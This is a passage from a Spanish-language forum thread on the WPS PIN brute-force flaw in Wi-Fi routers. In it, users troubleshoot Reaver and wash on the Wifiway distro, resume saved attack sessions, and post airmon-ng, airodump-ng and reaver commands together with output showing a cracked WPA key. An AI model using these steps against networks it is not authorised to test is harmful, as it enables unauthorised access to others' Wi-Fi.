?>/script>'; } ?> Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi Widgets Magazine

Autor Tema: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi  (Leído 415210 veces)

0 Usuarios y 1 Visitante están viendo este tema.

fer888

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #240 en: 23-01-2012, 20:21 (Lunes) »
pero en programa de walsh,como se la que se pueden?las que ponen ..no.. en el apartado de wps locked?

Shyraz

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #241 en: 23-01-2012, 20:54 (Lunes) »
Madre mía q stress!!, necesito pillarme una excedencia en el curro para poder asimilar todos los cambios; wifiway nuevo, reaver actualizado... >:D

Gracias Usuarionuevo por el nuevo módulo ;)

Manbostar

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #242 en: 23-01-2012, 22:12 (Lunes) »
Buenas

Hola, muy buenas tardes.
He estado haciendo pruebas de ataque wps con reaver 1.3 en WW3.0 a otro tipo de router que tengo, en casa de mi novia, (Smc networks). Y... al cabo de una semana, he podido terminar de la siguiente manera:
.......................
Me supongo que , por lo que he leido por aquí; que hay routers vulnerables  a este tipo de ataque y... otros que no.

No espero respueta, simplemente aportar un dato más insignificante. disculpen las molestias

 >:( >:( >:( >:(

Gracias por la prueba y por confirmar lo de una semana, se corresponde totalmente con los datos aportados al US-CERT por algún fabricante:

http://www.kb.cert.org/vuls/id/JALR-8PKL26

Citar
The vendor states that Technicolor products use an anti brute-force mechanism: after 5 retries, the access point is locked for 5 minutes. A penetration test performed by the vendor found that to exhaust every possible PIN would take around 189.44 hours (about 7.89 days).

Y ojo con esto y atentos a las próximas actualizaciones de firmware que es posible que vayan tapando el agujero:

Citar
The vendor plans to implement the exponential timeout algorithm as recommended by the WiFi Alliance to improve the anti brute-force mechanism. Customers should contact the vendor to inquiry when firmware updates will be available that include this feature.

Saludos
« Última modificación: 23-01-2012, 22:18 (Lunes) por Mambostar »

santi_03

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #243 en: 23-01-2012, 23:14 (Lunes) »
reaver 1.4 revision 102 ------>>  http://hotfile.com/dl/143267203/252ee7a/reaver-1.4-r102.xzm.html

funciona de maravilla.  >:(    graciass
« Última modificación: 23-01-2012, 23:15 (Lunes) por $@|\|TY_03 »

MovidasAfrikanas

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #244 en: 24-01-2012, 00:08 (Martes) »
Hola a todos, comunico qué, reaver 1.4 revision 102 va estupendamente y lo acabo de probar en WW3.4.
Gracias POR EL aporte y un saludo USUARIONUEVO. >:(

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15985
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #245 en: 24-01-2012, 01:27 (Martes) »
bueno , parece que ya por fin todo funciona,.  ;)

aunque puse ayer la revision 102 , y hoy van y liberan 1.4 FINAL.

LA revision 102 es de hace 2 dias..ya hare el modulo de la version final+salvar sesion reaver todo en uno.

ñandu

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #246 en: 24-01-2012, 07:11 (Martes) »
gracias usuarionuevo por semejante curro como100pre y al equipo salu2 >:(

ps3ps3ps3

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #247 en: 24-01-2012, 13:09 (Martes) »
Buenas,Estoy usando reaver 1.4,y os queria comentar una cosa,aller lo deje atacando por la noche y al despertar veo que llebaba un 60% pero ya no avanzaba por que habia dado este error:

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

Como puedo parar el ataque y seguir cuando quiera? aunque apague el pc o tenga que volver a poner la tarjeta en modo monitor,he visto que se pueden generar unos archivos XZM para salvar la sesion,pero no se como se usan o donde se colocan,gracias de antemano.

ñandu

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #248 en: 24-01-2012, 13:29 (Martes) »
lo paras con ctrl entra en salvar sesion reaver ,lo copias y se crearas un fichero en el escritorio ,despues copias el fichero en wifiway base y lo guardas , es cuestion de averiguar y  de leer un poco salu2 ^-^

ps3ps3ps3

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #249 en: 24-01-2012, 13:49 (Martes) »
He leido hombre... solo me falto eso que no me quedo claro,entonces mientras este probando pins pulso Ctrl+c y se parara luego le doy a Inicio/Wifiway/Wpa wps/salvar avance en XZM me saldra un archivo en el escritorio y ese archivo lo pego en la carpeta base y ataco de nuevo,lo unico que no se,donde esta la carpeta base??  ??? Gracias de nuevo

ñandu

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #250 en: 24-01-2012, 14:14 (Martes) »
no te has aclarado bien me parace que este funciona usando wifiway live USB yo en particular lo uso desde live USB en tu caso nose si lo usas desde live cd o live HD si lo usas desde live USB en el escritorio esta dispositivo de almacenamiento entras ahi t saldra el dibujo del usb lo pinchas te saldra boot wifiway pinchas en wifiway y ahi veras donde queda la base  ;)

ps3ps3ps3

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #251 en: 24-01-2012, 14:19 (Martes) »
no te has aclarado bien me parace que este funciona usando wifiway live USB yo en particular lo uso desde live USB en tu caso nose si lo usas desde live cd o live HD si lo usas desde live USB en el escritorio esta dispositivo de almacenamiento entras ahi t saldra el dibujo del usb lo pinchas te saldra boot wifiway pinchas en wifiway y ahi veras donde queda la base  ;)
Tu usas Wifiway 3.4 en USB? Yo lo ejecuto desde VirtualBox,lo are desde USB haber si asi me sale,Gracias ñandu  ;)

EDITO: Sigo en VirtualBox y ya encontre la carpeta wifiway/base,entonces me pongo a atacar,cuando quiera pararlo le doy a Ctrl+C,luego Inicio/wifiway/wpa wps/salvar avance en XZM y me sale un icono en el escritorio,ese icono lo copio a base y cuando buelva a atacar el mismo router ira por donde lo pare?? Gracias y perdona por marearte  ;D Saludos.
« Última modificación: 24-01-2012, 14:45 (Martes) por ps3ps3ps3 »

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15985
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #252 en: 24-01-2012, 23:20 (Martes) »
no te has aclarado bien me parace que este funciona usando wifiway live USB yo en particular lo uso desde live USB en tu caso nose si lo usas desde live cd o live HD si lo usas desde live USB en el escritorio esta dispositivo de almacenamiento entras ahi t saldra el dibujo del usb lo pinchas te saldra boot wifiway pinchas en wifiway y ahi veras donde queda la base  ;)
Tu usas Wifiway 3.4 en USB? Yo lo ejecuto desde VirtualBox,lo are desde USB haber si asi me sale,Gracias ñandu  ;)

EDITO: Sigo en VirtualBox y ya encontre la carpeta wifiway/base,entonces me pongo a atacar,cuando quiera pararlo le doy a Ctrl+C,luego Inicio/wifiway/wpa wps/salvar avance en XZM y me sale un icono en el escritorio,ese icono lo copio a base y cuando buelva a atacar el mismo router ira por donde lo pare?? Gracias y perdona por marearte  ;D Saludos.

exacto , cuando vuelvas a lanzar un ataque sobre el mismo objetivo , te dira que ya llevas uno empezado y si deseas empear de cero o seguir el que tenias.

de hecho eso mismo lo puede p`robar ya.

control+c no es necesario , puedes cerrar del tiron todas las ventanas,,el progresa se va salvando cada 5 segundos ...cuando dice los porcentajes..graba ...

lo de salvar sesiion , lo que hace es convertir el directorio de reaver en un modulo "portatil"   ...en ese modulo se iran salvando sistematicamente todos los ataques que vayas haciedno.

por ejemplo tu hoy paras ese , SALVAS SESIONNN ,  Y mañana empiezas otro ataque a un objetivo deferente ... y al volver a SALVAR , tendrias los dos..y asi sucesivamente ,es decir ... los vas guardando todos ,, SIEMPRE QUE EJECUTES SALVAR SESION , Y LLEVES EL ARCHIVO GENERADO AL DIRECTORIO BASE O MODULES , DE WIFIWAY.

lo de salvar sesion reaver , NO ES PARTE DEL PROGRAMA ,  lo pense  y lo hice JUSTAMENTE, con la finalidad de poder ir guardando , PRA LOS QUE USAMOS LA LIVE DESDE USB , O HD LIVE.

los que tienen wifiway instalado en disco duro , no necesitan hacer estas cosas.

ps3ps3ps3

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #253 en: 24-01-2012, 23:56 (Martes) »
Ya me quedo mas claro,pero cuando cierro un ataque al volver a atacar no me dice nada de que lleve algun ataque empezado,pero bueno si cuando vaya a quitarlo y guardo un archivo.xzm,cuando ataque de nuevo a ese router pongo reaver -i mon0 -b MAC (archivo xzm) -vv y asi si me continua con el ataque,lo que no me sigue contando igual es el % dara igual o debe seguir por donde termino? Saludos.
« Última modificación: 24-01-2012, 23:57 (Martes) por ps3ps3ps3 »

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15985
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #254 en: 25-01-2012, 00:12 (Miércoles) »
Ya me quedo mas claro,pero cuando cierro un ataque al volver a atacar no me dice nada de que lleve algun ataque empezado,pero bueno si cuando vaya a quitarlo y guardo un archivo.xzm,cuando ataque de nuevo a ese router pongo reaver -i mon0 -b MAC (archivo xzm) -vv y asi si me continua con el ataque,lo que no me sigue contando igual es el % dara igual o debe seguir por donde termino? Saludos.

no te enteras d eun pijo :=)

no necesitas hacer naaaaa ... tu salva el xzm a la carpeta base

si hoy hiciste

Código: [Seleccionar]
reaver -i mon0 -b 00:11:22:33:44:55 -vv
cuando otro dia vuelvas a lanzar

Código: [Seleccionar]
reaver -i mon0 -b 00:11:22:33:44:55 -vv
entonces te dira que ese ataque ya lleva un progreso.

siempre y cuando hayas metido el xzm en la carpeta base.

ñandu

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #255 en: 25-01-2012, 01:06 (Miércoles) »
mejor explicacion imposible  ;D ;D ;Dsalu2

maurimuy

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #256 en: 25-01-2012, 01:13 (Miércoles) »
Ya entiendo por que algunos han dicho que es posible obtener el Key entre 4 y 8 horas, el mio dio un tirón en pocos minutos del 2.24% al 90.93% tiempo total en obtener el Key Tres horas y media, pues no esta nada mal en algunos casos :)


jasp31

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #257 en: 30-01-2012, 12:56 (Lunes) »
Yo mis conocimientos de linux son muy limitados, asi que al ver que el walsh de la version 3.4 del wifiway con el reaver 1.4, no me hacia nada, pues me baje el wifiway 3.0 (siempre uso live cds), y ahi instale el reaver 1.3 y entonces el walsh si me funcionaba, asi que pues para walsh por ahora usare el wifiway 3.0 y para el reaver usare el wifiway 3.4.
Gracias a tod@s por los esfuerzos en aumentar nuestra seguridad.
A ver si la proxima version de wifiway ya incluye una version de walsh que funcione, una vez mas gracias a tod@s

manunct

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #258 en: 30-01-2012, 13:03 (Lunes) »
Yo mis conocimientos de linux son muy limitados, asi que al ver que el walsh de la version 3.4 del wifiway con el reaver 1.4, no me hacia nada, pues me baje el wifiway 3.0 (siempre uso live cds), y ahi instale el reaver 1.3 y entonces el walsh si me funcionaba, asi que pues para walsh por ahora usare el wifiway 3.0 y para el reaver usare el wifiway 3.4.
Gracias a tod@s por los esfuerzos en aumentar nuestra seguridad.
A ver si la proxima version de wifiway ya incluye una version de walsh que funcione, una vez mas gracias a tod@s

prueba con wash (no walsh) en wifiway 3.4

Garcad

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #259 en: 30-01-2012, 13:32 (Lunes) »
Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

Código: [Seleccionar]
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código: [Seleccionar]
# airmon-ng start wlan0
Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código: [Seleccionar]
# airodump-ng mon0
Cuando se en el canal que emite, cierro la ventana y sigo con...

Código: [Seleccionar]
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO
Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.



Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark  en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.

Código: [Seleccionar]
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv
Un vídeo que explica el proceso perfectamente.

http://www.youtube.com/watch?v=Vg_Wo_1eo5c

Salu2